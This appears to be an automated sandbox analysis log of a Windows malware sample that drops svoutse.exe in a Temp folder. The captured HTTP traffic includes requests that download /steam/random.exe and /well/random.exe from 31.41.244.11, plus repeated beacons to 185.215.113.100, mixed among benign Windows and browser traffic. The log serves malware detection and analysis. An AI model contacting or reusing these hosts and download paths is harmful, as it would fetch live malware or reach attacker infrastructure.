Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.22

Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Code function: 15_2_008ABCA0 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

15_2_008ABCA0

Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=slDVAaXtKD+FwpE&MD=5rttdFzP HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AY4GWKBMNax_FQrZEVzNkO_0mu3UShnzR6AihR_EPjVIUOT_pwZzkWCpOk8YKIu0qnIq_YObWXuPyiJ7NA0nDjMHUEYIIEknsNvJHXuPd0MqxESzoxi9xiMyJKNwZiVV1yEAxlKa5UVe61sINARQ7fO9dE0bkfP_W4GG/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1736717058&timestamp=1725616698784 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1726214297&P2=404&P3=2&P4=dblHULbu6FFsuywLRQ7E2QnAHBWrnn2Jr3u8urVQarlI4JUVNJfv5ru0BKmsDa%2fQqwS%2fmyh7q6Zf1kVNhreKpg%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: XarAPaSK/7t03lqXbosN/3Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/product_category_en/1.0.0/asset?assetgroup=ProductCategories HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ProductCategoriesSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=slDVAaXtKD+FwpE&MD=5rttdFzP HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /assets/addressbar_uu_files.en-gb/1.0.2/asset?assetgroup=AddressBar HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: AddressBarSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Fri, 06 Sep 2024 07:18:45 GMTIf-None-Match: "66daacd5-1ace00"
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache

Source: firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
